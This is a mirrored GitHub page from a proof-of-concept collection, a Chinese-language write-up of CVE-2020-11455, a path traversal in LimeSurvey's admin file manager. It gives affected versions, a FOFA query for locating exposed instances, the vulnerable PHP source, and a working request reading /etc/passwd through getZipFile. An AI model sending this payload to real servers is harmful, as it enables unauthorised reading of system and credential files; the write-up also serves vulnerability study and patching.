admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/LimeSurvey LimeSurveyFileManager.php 后台任意文件读取漏洞 CVE-2020-11455.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

70 lines
2.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# LimeSurvey LimeSurveyFileManager.php 后台任意文件读取漏洞 CVE-2020-11455
## 漏洞描述
LimeSurvey前称PHPSurveyor是LimeSurvey团队的一套开源的在线问卷调查程序它支持调查程序开发、调查问卷发布以及数据收集等功能。 LimeSurvey 4.1.12 + 200324之前版本中的application/controllers/admin/LimeSurveyFileManager.php文件存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
## 漏洞影响
```
LimeSurvey < 4.1.12 + 200324
```
## FOFA
```
app="LimeSurvey"
```
## 漏洞复现
登录页面
![](./images/202205241501186.png)
出现漏洞的文件为 `application/controllers/admin/LimeSurveyFileManager.php`
![](./images/202205241501266.png)
```
public function downloadFiles() {
App()->loadLibrary('admin.pclzip');
$folder = basename(Yii::app()->request->getPost('folder', 'global'));
$files = Yii::app()->request->getPost('files');
$tempdir = Yii::app()->getConfig('tempdir');
$randomizedFileName = $folder.'_'.substr(md5(time()),3,13).'.zip';
$zipfile = $tempdir.DIRECTORY_SEPARATOR.$randomizedFileName;
$arrayOfFiles = array_map( function($file){ return $file['path']; }, $files);
$archive = new PclZip($zipfile);
$checkFileCreate = $archive->create($arrayOfFiles, PCLZIP_OPT_REMOVE_ALL_PATH);
$urlFormat = Yii::app()->getUrlManager()->getUrlFormat();
$getFileLink = Yii::app()->createUrl('admin/filemanager/sa/getZipFile');
if($urlFormat == 'path') {
$getFileLink .= '?path='.$zipfile;
} else {
$getFileLink .= '&path='.$zipfile;
}
$this->_printJsonResponse(
[
'success' => true,
'message' => sprintf(gT("Files are ready for download in archive %s."), $randomizedFileName),
'downloadLink' => $getFileLink ,
]
);
}
```
路由为: `admin/filemanager/sa/getZipFile`, 这里传入参数 path 到方法 `getZipFile()`
![](./images/202205241501030.png)
这里通过 readfile方法 读取文件,登录后台后发送请求
```
/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
```
![](./images/202205241501923.png)
Reference in New Issue View Git Blame Copy Permalink